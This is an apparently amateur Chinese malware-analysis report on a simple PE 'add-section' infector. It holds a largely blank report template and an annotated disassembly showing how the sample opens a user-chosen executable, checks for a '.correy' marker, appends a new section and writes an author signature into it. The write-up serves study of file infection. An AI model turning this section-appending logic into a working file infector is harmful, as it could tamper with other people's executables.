简单pe添加节病毒分析

菜鸟的病毒分析
基本信息

  报告名称：简单pe添加节病毒分析                                                   
  作者：                                                           
  报告更新日期： 2012.07.08                                          
  样本发现日期：                                           
  样本类型：                                                   
  样本文件大小／被感染文件变化长度：   
  样本文件MD5 校验值：                            
  样本文件SHA1 校验值：                           
  壳信息：                                                       
  可能受到威胁的系统： Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Services Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
Microsoft Windows vista
Microsoft Windows 7                                                          
  相关漏洞：                                                   
  已知检测名称：

简介
pe文件感染病毒

被感染系统及网络症状

文件系统变化
伪装的windows对话框 用户选择的文件将被修改

注册表变化

详细分析／功能介绍
1.程序运行后弹出选择文件的对话框
2.选择完毕，程序获取文件路径，打开文件创建映射
3.获取入口地址，头的大小，节的数量，对其粒子等信息
4.判断能否直接添加一个节，如果不能处理节表后面得数据
5.添加一个节，写入节的相关信息
6.改写pe文件大小，节的数量
7.关闭结束进程

预防及修复措施
运行程序前查看程序是否安全，安装杀软

技术热点及总结
对于我这个菜鸟来说还是有很多值得学习的地方，伪装UI的api，getopenfilename以及结构
LPOPENFILENAME
getopenfilename该函数创建一个Open公共对话框，使用户指定驱动器、目录和文件名、或使用户打开文件。如果用户指定了一个文件名，点击OK按钮，返回值为非零。由OPENFILENAME结构的IPstrFile成员指向的缓冲区含有全路径和用户指定的文件名。如果用户取消或关闭Open对话框或错误出现，返回值为零。
OPENFILENAME结构包含了GetOpenFileName和GetSaveFileName函数用来初始化打开或另存为对话框的信息。在用户关闭对话框后，系统返回关于用户的选择信息到这个结构中。

在程序中不仅要获得映射后的数据地址还要获得相对便宜，因为在写文件前移动指针的时候这个很重要。
反汇编代码：

 返回对其大小的函数
.text:00401000 ; Attributes: bp-based frame
.text:00401000
.text:00401000 sub_401000      proc near               ; CODE XREF: start+2F7p
.text:00401000                                         ; start+32Bp ...
.text:00401000
.text:00401000 arg_0           = dword ptr  8
.text:00401000 arg_4           = dword ptr  0Ch
.text:00401000
.text:00401000                 push    ebp
.text:00401001                 mov     ebp, esp
.text:00401003                 push    edx
.text:00401004                 mov     eax, [ebp+arg_0]
.text:00401007                 xor     edx, edx
.text:00401009                 div     [ebp+arg_4]
.text:0040100C                 cmp     edx, 0
.text:0040100F                 jz      short loc_401012
.text:00401011                 inc     eax
.text:00401012
.text:00401012 loc_401012:                             ; CODE XREF: sub_401000+Fj
.text:00401012                 mul     [ebp+arg_4]
.text:00401015                 pop     edx
.text:00401016                 leave
.text:00401017                 retn    8
.text:00401017 sub_401000      endp
.text:00401017
入口函数
伪装ui
.text:0040101A
.text:0040101A                 public start
.text:0040101A start           proc near
.text:0040101A                 mov     OpenFileNAme.lStructSize, 4Ch
.text:00401024                 mov     OpenFileNAme.lpstrFilter, offset aPeFile_exe_dll ; "pe File (*.exe, *.dll)"
.text:0040102E                 mov     OpenFileNAme.lpstrFile, offset NumberOfBytesWritten
.text:00401038                 mov     OpenFileNAme.nMaxFile, 200h ; lpfile返回用户的选择信息 即被选择的文件路径
.text:00401042                 mov     OpenFileNAme.Flags, 281804h
.text:0040104C                 push    offset OpenFileNAme ; LPOPENFILENAMEA
.text:00401051                 call    GetOpenFileNameA ; 创建open公共对话框
打开文件创建映射
.text:00401056                 push    0               ; hTemplateFile
.text:00401058                 push    80h             ; dwFlagsAndAttributes
.text:0040105D                 push    3               ; dwCreationDisposition
.text:0040105F                 push    0               ; lpSecurityAttributes
.text:00401061                 push    3               ; dwShareMode
.text:00401063                 push    0C0000000h      ; dwDesiredAccess
.text:00401068                 push    offset NumberOfBytesWritten ; lpFileName
.text:0040106D                 call    CreateFileA     ; 打开选择的文件
.text:00401072                 mov     hFile, eax
.text:00401077                 push    0               ; lpName
.text:00401079                 push    0               ; dwMaximumSizeLow
.text:0040107B                 push    0               ; dwMaximumSizeHigh
.text:0040107D                 push    2               ; flProtect
.text:0040107F                 push    0               ; lpFileMappingAttributes
.text:00401081                 push    eax             ; hFile
.text:00401082                 call    CreateFileMappingA
.text:00401087                 push    0               ; dwNumberOfBytesToMap
.text:00401089                 push    0               ; dwFileOffsetLow
.text:0040108B                 push    0               ; dwFileOffsetHigh
.text:0040108D                 push    4               ; dwDesiredAccess
.text:0040108F                 push    eax             ; hFileMappingObject
.text:00401090                 call    MapViewOfFile
.text:00401095                 mov     map_address, eax ; 创建文件映像 返回映射地址
获取pe文件信息
.text:0040109A                 mov     esi, map_address
.text:004010A0                 add     esi, 3Ch
.text:004010A3                 mov     esi, [esi]
.text:004010A5                 mov     peheader_rva, esi
.text:004010AB                 mov     eax, map_address
.text:004010B0                 add     esi, eax
.text:004010B2                 mov     peheader, esi
.text:004010B8                 mov     esi, peheader
.text:004010BE                 add     esi, 6
.text:004010C1                 mov     dx, [esi]
.text:004010C4                 movsx   edx, dx
.text:004010C7                 mov     section_number, edx
.text:004010CD                 mov     esi, peheader
.text:004010D3                 add     esi, 18h
.text:004010D6                 mov     option_header, esi
.text:004010DC                 mov     esi, peheader
.text:004010E2                 add     esi, 14h
.text:004010E5                 mov     dx, [esi]
.text:004010E8                 movsx   edx, dx
.text:004010EB                 mov     sizeof_optionheader, edx
.text:004010F1                 mov     esi, peheader
.text:004010F7                 add     esi, 54h
.text:004010FA                 mov     esi, [esi]
.text:004010FC                 mov     check_sum, esi
.text:00401102                 mov     eax, map_address
.text:00401107                 add     eax, check_sum
.text:0040110D                 mov     map_address_csum, eax
.text:00401112                 mov     esi, peheader
.text:00401118                 add     esi, 38h
.text:0040111B                 mov     esi, [esi]
.text:0040111D                 mov     sectionalign, esi
.text:00401123                 mov     esi, peheader
.text:00401129                 add     esi, 3Ch
.text:0040112C                 mov     esi, [esi]
.text:0040112E                 mov     filealign, esi
.text:00401134                 mov     esi, option_header
.text:0040113A                 add     esi, sizeof_optionheader
.text:00401140                 mov     sectiontable, esi
.text:00401146                 mov     eax, 28h
.text:0040114B                 mov     ebx, section_number
.text:00401151                 mul     ebx
.text:00401153                 add     eax, sectiontable
.text:00401159                 mov     sectionbackadress, eax ; 节的尾部地址
.text:0040115E                 sub     eax, map_address
.text:00401164                 mov     lDistanceToMove, eax ; 相对偏移
.text:00401169                 mov     eax, sectionbackadress
.text:0040116E                 sub     eax, 28h
.text:00401171                 mov     esi, eax
.text:00401173                 lea     edi, a_correy   ; ".correy "
.text:00401179                 mov     ecx, 8
.text:0040117E                 repe cmpsb
感染标志最后一个节的名字
.text:00401180                 jz      loc_401528      ; 比较最后一个节的名字，是否为。correy
.text:00401180                                         ; 如果是结束
.text:00401186                 lea     esi, OpenFileNAme.pvReserved
.text:0040118C                 mov     eax, map_address
.text:00401191                 add     eax, lDistanceToMove
.text:00401197                 mov     edi, eax
.text:00401199                 mov     ecx, 28h
.text:0040119E                 repe cmpsb              ; 比较新节位置是否符合要求
.text:004011A0                 jz      loc_401278      ; 符合要求 添加节
处理节表尾数据
.text:004011A6                 mov     eax, check_sum  ; 不符合要求先处理节表后面的数据 在进行添加节
.text:004011AB                 sub     eax, lDistanceToMove
.text:004011B1                 mov     chsum_rvalast, eax
.text:004011B6                 mov     ecx, eax
.text:004011B8                 mov     eax, map_address
.text:004011BD                 add     eax, check_sum
.text:004011C3                 mov     esi, eax
.text:004011C5                 lea     edi, unk_403278
.text:004011CB
.text:004011CB loc_4011CB:                             ; CODE XREF: start+1BBj
.text:004011CB                 dec     esi
.text:004011CC                 inc     edi
.text:004011CD                 mov     bl, [esi]
.text:004011CF                 mov     [edi], bl
.text:004011D1                 dec     ecx
.text:004011D2                 cmp     ecx, 0
.text:004011D5                 jnz     short loc_4011CB
.text:004011D7                 mov     ecx, 0FFFFFFFFh
.text:004011DC                 lea     esi, unk_403278
.text:004011E2
.text:004011E2 loc_4011E2:                             ; CODE XREF: start+1CEj
.text:004011E2                 inc     esi
.text:004011E3                 inc     ecx
.text:004011E4                 mov     al, [esi]
.text:004011E6                 cmp     al, 0
.text:004011E8                 jz      short loc_4011E2
.text:004011EA                 cmp     ecx, 28h
.text:004011ED                 jb      loc_40153A
.text:004011F3                 mov     dword_403ABA, ecx
.text:004011F9                 mov     eax, chsum_rvalast
.text:004011FE                 sub     eax, ecx
.text:00401200                 mov     nNumberOfBytesToWrite, eax
.text:00401205                 mov     ecx, chsum_rvalast
.text:0040120B                 inc     ecx
.text:0040120C                 mov     eax, map_address
.text:00401211                 add     eax, lDistanceToMove
.text:00401217                 mov     esi, eax
.text:00401219                 lea     edi, unk_40367B
.text:0040121F                 dec     esi
.text:00401220                 dec     edi
.text:00401221
.text:00401221 loc_401221:                             ; CODE XREF: start+211j
.text:00401221                 inc     esi
.text:00401222                 inc     edi
.text:00401223                 mov     bl, [esi]
.text:00401225                 mov     [edi], bl
.text:00401227                 dec     ecx
.text:00401228                 cmp     ecx, 0
.text:0040122B                 jnz     short loc_401221
.text:0040122D                 push    0               ; dwMoveMethod
.text:0040122F                 push    0               ; lpDistanceToMoveHigh
.text:00401231                 push    lDistanceToMove ; lDistanceToMove
.text:00401237                 push    hFile           ; hFile
.text:0040123D                 call    SetFilePointer
.text:00401242                 push    0               ; lpOverlapped
.text:00401244                 push    offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:00401249                 push    28h             ; nNumberOfBytesToWrite
.text:0040124B                 push    offset unk_403150 ; lpBuffer
.text:00401250                 push    hFile           ; hFile
.text:00401256                 call    WriteFile
.text:0040125B                 push    0               ; lpOverlapped
.text:0040125D                 push    offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:00401262                 push    nNumberOfBytesToWrite ; nNumberOfBytesToWrite
.text:00401268                 push    offset unk_40367B ; lpBuffer
.text:0040126D                 push    hFile           ; hFile
.text:00401273                 call    WriteFile
.text:00401278
.text:00401278 loc_401278:                             ; CODE XREF: start+186j
添加节头
.text:00401278                 mov     eax, peheader_rva
.text:0040127D                 add     eax, 6
.text:00401280                 push    0               ; dwMoveMethod
.text:00401282                 push    0               ; lpDistanceToMoveHigh
.text:00401284                 push    eax             ; lDistanceToMove
.text:00401285                 push    hFile           ; hFile
.text:0040128B                 call    SetFilePointer
.text:00401290                 inc     section_number
.text:00401296                 push    0               ; lpOverlapped
.text:00401298                 push    offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:0040129D                 push    2               ; nNumberOfBytesToWrite
.text:0040129F                 push    offset section_number ; lpBuffer
.text:004012A4                 push    hFile           ; hFile
.text:004012AA                 call    WriteFile       ; 更改节的数量加1
.text:004012AF                 push    0               ; dwMoveMethod
.text:004012B1                 push    0               ; lpDistanceToMoveHigh
.text:004012B3                 push    lDistanceToMove ; lDistanceToMove
.text:004012B9                 push    hFile           ; hFile
.text:004012BF                 call    SetFilePointer  ; 指针移动到新的节准备写数据
.text:004012C4                 push    0               ; lpOverlapped
.text:004012C6                 push    offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:004012CB                 push    8               ; nNumberOfBytesToWrite
.text:004012CD                 push    offset a_correy ; ".correy "
.text:004012D2                 push    hFile           ; hFile
.text:004012D8                 call    WriteFile       ; 写入前节名
.text:004012DD                 push    offset String   ; "made by correy QQ:112426112 Email:legua"...
.text:004012E2                 call    lstrlenA
.text:004012E7                 mov     nNumberOfBytesToWrite, eax
.text:004012EC                 push    0               ; lpOverlapped
.text:004012EE                 push    offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:004012F3                 push    4               ; nNumberOfBytesToWrite
.text:004012F5                 push    offset nNumberOfBytesToWrite ; lpBuffer
.text:004012FA                 push    hFile           ; hFile
.text:00401300                 call    WriteFile       ; 写入上面的数据大小 即节的大小
.text:00401305                 push    sectionalign
.text:0040130B                 push    nNumberOfBytesToWrite
.text:00401311                 call    sub_401000      ; 返回对其大小
.text:00401316                 mov     dword_403AD2, eax
.text:0040131B                 mov     eax, sectionbackadress
.text:00401320                 sub     eax, 1Ch
.text:00401323                 mov     eax, [eax]
.text:00401325                 mov     dword_403ABA, eax
.text:0040132A                 mov     eax, sectionbackadress
.text:0040132F                 sub     eax, 20h
.text:00401332                 mov     eax, [eax]
.text:00401334                 mov     nNumberOfBytesToWrite, eax
.text:00401339                 push    sectionalign
.text:0040133F                 push    nNumberOfBytesToWrite
.text:00401345                 call    sub_401000      ; 返回对其大小
.text:0040134A                 add     eax, dword_403ABA
.text:00401350                 mov     dword_403ABA, eax
.text:00401355                 push    0               ; lpOverlapped
.text:00401357                 push    offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:0040135C                 push    4               ; nNumberOfBytesToWrite
.text:0040135E                 push    offset dword_403ABA ; lpBuffer
.text:00401363                 push    hFile           ; hFile
.text:00401369                 call    WriteFile       ; 计算对其内存大小 并写入数据
.text:0040136E                 push    filealign
.text:00401374                 push    nNumberOfBytesToWrite
.text:0040137A                 call    sub_401000      ; 返回对其大小
.text:0040137F                 mov     dword_403AC6, eax
.text:00401384                 push    0               ; lpOverlapped
.text:00401386                 push    offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:0040138B                 push    4               ; nNumberOfBytesToWrite
.text:0040138D                 push    offset dword_403AC6 ; lpBuffer
.text:00401392                 push    hFile           ; hFile
.text:00401398                 call    WriteFile
.text:0040139D                 mov     eax, sectionbackadress
.text:004013A2                 sub     eax, 14h
.text:004013A5                 mov     eax, [eax]
.text:004013A7                 mov     nNumberOfBytesToWrite, eax
.text:004013AC                 mov     eax, sectionbackadress
.text:004013B1                 sub     eax, 18h
.text:004013B4                 mov     eax, [eax]
.text:004013B6                 add     eax, nNumberOfBytesToWrite
.text:004013BC                 mov     dword_403AC2, eax
.text:004013C1                 push    0               ; lpOverlapped
.text:004013C3                 push    offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:004013C8                 push    4               ; nNumberOfBytesToWrite
.text:004013CA                 push    offset dword_403AC2 ; lpBuffer
.text:004013CF                 push    hFile           ; hFile
.text:004013D5                 call    WriteFile       ; 写入磁盘偏移
.text:004013DA                 mov     eax, lDistanceToMove
.text:004013DF                 add     eax, 24h
.text:004013E2                 push    0               ; dwMoveMethod
.text:004013E4                 push    0               ; lpDistanceToMoveHigh
.text:004013E6                 push    eax             ; lDistanceToMove
.text:004013E7                 push    hFile           ; hFile
.text:004013ED                 call    SetFilePointer
.text:004013F2                 push    0               ; lpOverlapped
.text:004013F4                 push    offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:004013F9                 push    4               ; nNumberOfBytesToWrite
.text:004013FB                 push    offset asc_403082 ; " "
.text:00401400                 push    hFile           ; hFile
.text:00401406                 call    WriteFile       ; 写入节的属性
.text:0040140B                 mov     eax, peheader
.text:00401410                 add     eax, 1Ch
.text:00401413                 mov     eax, [eax]
.text:00401415                 add     eax, dword_403AC6
.text:0040141B                 mov     newfilesize, eax
.text:00401420                 mov     ebx, peheader_rva
.text:00401426                 add     ebx, 1Ch
.text:00401429                 push    0               ; dwMoveMethod
.text:0040142B                 push    0               ; lpDistanceToMoveHigh
.text:0040142D                 push    ebx             ; lDistanceToMove
.text:0040142E                 push    hFile           ; hFile
.text:00401434                 call    SetFilePointer
.text:00401439                 push    0               ; lpOverlapped
.text:0040143B                 push    offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:00401440                 push    4               ; nNumberOfBytesToWrite
.text:00401442                 push    offset newfilesize ; lpBuffer
.text:00401447                 push    hFile           ; hFile
.text:0040144D                 call    WriteFile       ; 改写新的文件大小
.text:00401452                 mov     eax, peheader
.text:00401457                 add     eax, 50h
.text:0040145A                 mov     eax, [eax]
.text:0040145C                 add     eax, dword_403AD2
.text:00401462                 mov     dword_403ACE, eax
.text:00401467                 mov     ebx, peheader_rva
.text:0040146D                 add     ebx, 50h
.text:00401470                 push    0               ; dwMoveMethod
.text:00401472                 push    0               ; lpDistanceToMoveHigh
.text:00401474                 push    ebx             ; lDistanceToMove
.text:00401475                 push    hFile           ; hFile
.text:0040147B                 call    SetFilePointer
.text:00401480                 push    0               ; lpOverlapped
.text:00401482                 push    offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:00401487                 push    4               ; nNumberOfBytesToWrite
.text:00401489                 push    offset dword_403ACE ; lpBuffer
.text:0040148E                 push    hFile           ; hFile
.text:00401494                 call    WriteFile       ; 修改sizeofheader
.text:00401499                 push    0               ; dwMoveMethod
.text:0040149B                 push    0               ; lpDistanceToMoveHigh
.text:0040149D                 push    dword_403AC2    ; lDistanceToMove
.text:004014A3                 push    hFile           ; hFile
写文件
.text:004014A9                 call    SetFilePointer
.text:004014AE                 push    0               ; lpOverlapped
.text:004014B0                 push    offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:004014B5                 push    55h             ; nNumberOfBytesToWrite
.text:004014B7                 push    offset String   ; "made by correy QQ:112426112 Email:legua"...
.text:004014BC                 push    hFile           ; hFile
.text:004014C2                 call    WriteFile
.text:004014C7                 mov     eax, dword_403AC6
.text:004014CC                 add     eax, dword_403AC2
.text:004014D2                 push    eax
.text:004014D3                 push    0               ; dwMoveMethod
.text:004014D5                 push    0               ; lpDistanceToMoveHigh
.text:004014D7                 push    eax             ; lDistanceToMove
.text:004014D8                 push    hFile           ; hFile
.text:004014DE                 call    SetFilePointer
.text:004014E3                 pop     eax
.text:004014E4                 sub     eax, 55h
.text:004014E7                 push    0               ; dwMoveMethod
.text:004014E9                 push    0               ; lpDistanceToMoveHigh
.text:004014EB                 push    eax             ; lDistanceToMove
.text:004014EC                 push    hFile           ; hFile
.text:004014F2                 call    SetFilePointer
.text:004014F7                 push    0               ; lpOverlapped
.text:004014F9                 push    offset NumberOfBytesWritten ; lpNumberOfBytesWritten
.text:004014FE                 push    55h             ; nNumberOfBytesToWrite
.text:00401500                 push    offset String   ; "made by correy QQ:112426112 Email:legua"...
.text:00401505                 push    hFile           ; hFile
.text:0040150B                 call    WriteFile       ; 写文件
.text:00401510                 push    hFile           ; hFile
.text:00401516                 call    FlushFileBuffers
.text:0040151B                 push    hFile           ; hObject
.text:00401521                 call    CloseHandle
.text:00401526                 jmp     short loc_40154A
.text:00401528 ; ---------------------------------------------------------------------------
.text:00401528
.text:00401528 loc_401528:                             ; CODE XREF: start+166j
.text:00401528                 push    0               ; uType
.text:0040152A                 push    0               ; lpCaption
.text:0040152C                 push    offset Text     ; "文?
.text:00401531                 push    0               ; hWnd
.text:00401533                 call    MessageBoxA
.text:00401538                 jmp     short loc_40154A
.text:0040153A ; ---------------------------------------------------------------------------
.text:0040153A
.text:0040153A loc_40153A:                             ; CODE XREF: start+1D3j
.text:0040153A                 push    0               ; uType
.text:0040153C                 push    0               ; lpCaption
.text:0040153E                 push    offset asc_403086 ; "节头?
.text:00401543                 push    0               ; hWnd
.text:00401545                 call    MessageBoxA
.text:0040154A
.text:0040154A loc_40154A:                             ; CODE XREF: start+50Cj
.text:0040154A                                         ; start+51Ej
.text:0040154A                 push    0               ; uExitCode
.text:0040154C                 call    ExitProcess
.text:0040154C start           endp